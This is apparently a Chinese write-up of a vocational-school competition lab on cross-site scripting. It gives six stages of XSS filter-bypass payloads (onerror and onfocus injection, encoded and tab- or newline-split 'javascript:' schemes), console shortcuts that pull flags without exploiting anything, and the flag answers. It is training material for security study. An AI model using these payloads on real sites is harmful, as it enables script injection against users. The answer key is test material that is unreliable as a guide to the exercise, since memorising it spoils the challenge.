2023年中职“网络安全“—跨站脚本深入①

简介: 2023年中职“网络安全“—跨站脚本深入①

跨站脚本深入

任务环境说明:

服务器场景:Server2125(关闭链接)

 服务器场景操作系统:未知

1. 访问服务器网站目录1,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:http://靶机IP/1/?name=</h2><img src=1 onerror=alert(1)>

7c42a78cea5d244a0452363ac095c516.png

解法二:F12打开控制台,输入 alert(1) 回车

4961081ffd96aa101bf0aad45d300147.png

解法三:F12打开控制台,输入 b64_md5('simple') 回车

19474df00a44bc2d8cb6090773fdb29d.png

flag:jb3aSPuHSNZ0bxllgk6Wag

2. 访问服务器网站目录2,根据页面信息完成条件,将获取到弹框信息作为flag提交

解法一:http://靶机IP/2/index.php?keyword="</h2><img SRC=1 ONERROR=alert(1)>&submit=搜索

3cd92fa4ddef0a0f97b0f29f244d7e21.png


解法二:F12打开控制台,输入 alert() 回车


18043c262bf357733f08abf26cbca934.png

解法三:F12打开控制台,输入 b64_md5('relaxed') 回车

fef13cca5a2feb7616447592ba264b48.png

flag:gfMr4koqYvxHLMQ+3JfmWw

3. 访问服务器网站目录3,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:
    先把javascript:alert(1)转换成HTML编码

54d2ce7c430250c69113542b16e6d517.png

    (1)输入进去,回车
    (2)然后在点击友情链接

1627913346756991e96053e534455c32.png

解法二:
    在url中的keyword参数后输出javas%09cript:alert(1)
    然后在点击友情链接


31a316193c186bac83d96e0acac90876.png

解法三:F12打开控制台,输入 alert() 回车

33779bdd0f30edb53e879dba344681b4.png

解法四:F12打开控制台,输入 b64_md5('challenge') 回车


6a390329983a1fff6a483f46d0614d6e.png

flag:sE7ArePUm0oHnw4gfV4oIQ

4. 访问服务器网站目录4,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:
    使用Win7的谷歌浏览器,发现了这些

77b8b644c96ddd0a12a8b90e696174ad.png

    " οnfοcus="alert(1)" type=text "
    提交Cookie后点击一下input框,就会弹出来
    其他触发事件也可以,不值可以用onfocus
解法二:F12打开控制台,输入 alert() 回车

56b1dfa6106333a28eae8f4444da3ae3.png

解法三:F12打开控制台,输入 b64_md5('commonly') 回车

fcca44c6254f855db783a23f4f2c2931.png

flag:nQO7ofm1/wzUgGBnrR55qg

5. 访问服务器网站目录5,根据页面信息完成条件,将获取到弹框信息作为flag提交;

我怀疑这题有问题,这题应该对应XSS-Labs第15关
解法一:F12打开控制台,输入 alert(1) 回车



aff8928ccf7becde76e7a145fe3b92c8.png

解法二:F12打开控制台,输入 b64_md5('Uncomfortable') 回车

6f0b053f8ca46c1fa2bc2fcfaf6f9dcd.png

g:QmRhA990viE8yP/PWbnKhw

6. 访问服务器网站目录6,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:http://靶机IP/6/?keyword=%3Cimg%0Asrc=1%0Dοnerrοr=alert()%3E

247057dde75cecee945cbcffe19441e4.png

解法二:F12打开控制台,输入 alert() 回车


ce935866297824db5852ba0f34fa8093.png


flag:LHOm3XR7ig6+hgo2Zd/Y6g


目录
相关文章
|
4天前
|
安全 Linux 网络安全
第十六届山东省职业院校技能大赛中职组网络安全赛项竞赛正式试题
第十六届山东省职业院校技能大赛中职组网络安全赛项竞赛正式试题
|
4天前
|
存储 网络安全 数据安全/隐私保护
【专栏】Python 网络设备管理中,`ConnectHandler`(Paramiko库)和`telnetlib`模块常用于设备交互。
【4月更文挑战第28天】Python 网络设备管理中,`ConnectHandler`(Paramiko库)和`telnetlib`模块常用于设备交互。`ConnectHandler`简化SSH连接,便于与网络设备交互,而`telnetlib`是Python内置模块,支持Telnet协议的远程登录操作。两者都提供命令执行和响应接收功能。示例代码展示了如何使用它们获取防火墙设备的版本信息,降低了代码复杂度,提高了可读性和维护性。
|
4天前
|
网络协议 安全
【专栏】`curl`是广泛用于网络编程和自动化脚本的命令行工具,支持HTTP、HTTPS等协议
【4月更文挑战第28天】`curl`是广泛用于网络编程和自动化脚本的命令行工具,支持HTTP、HTTPS等协议。在处理大文件或慢速服务器时,设置超时参数至关重要。本文介绍了`curl`的超时参数,如`-m`(最大操作时间)、`-c`(连接超时)、`--dns-timeout`(DNS解析超时)和`-t`(时间条件)。通过示例展示了如何设置这些超时,并提到了一些高级技巧和注意事项,如错误处理和带宽限制。合理设置超时能提高效率和可靠性,对编写健壮的自动化脚本非常有用。
|
4天前
|
安全 JavaScript 前端开发
第十六届山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题—B模块安全事件响应/网络安全数据取证/应用安全
该内容描述了一次网络安全演练,包括七个部分:Linux渗透提权、内存取证、页面信息发现、数字取证调查、网络安全应急响应、Python代码分析和逆向分析。参与者需在模拟环境中收集Flag值,涉及任务如获取服务器信息、提权、解析内存片段、分析网络数据包、处理代码漏洞、解码逆向操作等。每个部分都列出了若干具体任务,要求提取或生成特定信息作为Flag提交。
25 0
|
4天前
|
安全 Linux 网络安全
第十六届山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题—A模块基础设施设置/安全加固
该任务是网络安全工程师模拟实战,目标是强化A模块服务器(Windows和Linux)的安全性。任务包括:设置强密码策略,限制用户权限,如禁用命令提示符,隐藏登录用户名;实施Nginx安全策略,禁止目录浏览,限制HTTP请求,调整超时时间,降权运行;配置日志监控,设定不同日志文件大小及覆盖规则;加固SSHD, VSFTPD, IIS服务,修改SSH端口,限制root登录,调整VSFTPD和IIS设置;优化本地安全策略,禁止匿名访问,保护密码存储,控制用户登录;最后,设计防火墙规则,限制SSH枚举,防御DoS攻击,并控制DNS解析请求。所有更改需截图并附说明,按指定格式保存提交。
16 0
|
4天前
|
安全 测试技术 网络安全
2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-C安全事件响应/网络安全数据取证/应用安全
B模块涵盖安全事件响应和应用安全,包括Windows渗透测试、页面信息发现、Linux系统提权及网络安全应急响应。在Windows渗透测试中,涉及系统服务扫描、DNS信息提取、管理员密码、.docx文件名及内容、图片中单词等Flag值。页面信息发现任务包括服务器端口、主页Flag、脚本信息、登录成功信息等。Linux系统渗透需收集SSH端口号、主机名、内核版本,并实现提权获取root目录内容和密码。网络安全应急响应涉及删除后门用户、找出ssh后门时间、恢复环境变量文件、识别修改的bin文件格式及定位挖矿病毒钱包地址。
16 0
|
4天前
|
安全 Linux 网络安全
2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-B-CTF夺旗与攻击
模块C和D是CTF夺旗比赛,分别侧重攻击和防御。作为渗透测试工程师,你需要在靶机(Linux/Windows)上找寻多种漏洞,如命令注入、文件上传、文件包含、远程代码执行和缓冲区溢出,以获取权限。同时,注意不能攻击裁判服务器,违者将被罚离场。提交靶机的唯一标识flag值并按规则加分。模块D中,你需要在堡垒服务器上发现并修复同样类型的漏洞,保证服务可用性,制作系统防御报告,所有截图需清晰,文件以PDF格式保存提交。
15 0
|
4天前
|
安全 Linux 网络安全
2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-C基础设施设置/安全加固
网络安全工程师需对AServer08(Win)和AServer09(Linux)进行安全加固,包括密码策略(复杂性、长度),Windows用户管理(所有权、命令提示符、用户名显示),Nginx安全配置(禁止目录浏览、限制HTTP请求、超时设置、降权运行)。日志监控涉及安全、应用和系统日志的最大大小及覆盖策略。中间件服务加固涉及SSH(端口、root登录、计划任务、PID路径),VSFTPD(非特权用户、连接端口、本地用户限制),IIS(日志审计、关闭WebDAV)。本地安全策略涵盖匿名枚举、无登录关闭、凭证存储、权限应用和登录超时
20 0
|
4天前
|
安全 测试技术 网络安全
2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-B模块安全事件响应/网络安全数据取证/应用安全
该文本描述了一组网络安全挑战,涉及Windows渗透测试、数字取证和Web安全。挑战包括使用Kali Linux进行系统扫描、DNS信息提取、管理员密码获取、文件名和内容检索以及图片中单词的识别。此外,还有针对FTPServer的数据包分析,寻找恶意用户活动的痕迹如HTTP访问、端口扫描、密码和木马密码。在Web安全部分,需通过渗透测试不同页面,解决一系列逻辑谜题以获取Flag。最后,有跨站脚本渗透测试,要求访问多个服务器目录并依据页面提示触发弹框以获得Flag。
18 0
|
4天前
|
安全 Linux 网络安全
2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-B
网络安全模块A,涉及Windows和Linux服务器的安全加固。任务包括:设置强密码和登录策略,如账户锁定和最小密码长度;禁止未加密密码传输和来宾账户访问;关闭系统时清除内存页面文件,禁止无登录关机,限制驱动器访问;确保流量完整性,如SSL访问和SSH证书登录;事件监控,如应用日志存档;服务加固,如SSH禁止root远程登录,VSFTPD超时设置,IIS防止文件枚举和关闭WebDAV;以及防火墙策略,如限制DNS转发,禁止ping,禁用端口和MAC地址,限制IP碎片和SSH连接。所有更改需截图并按指定格式保存提交。
14 0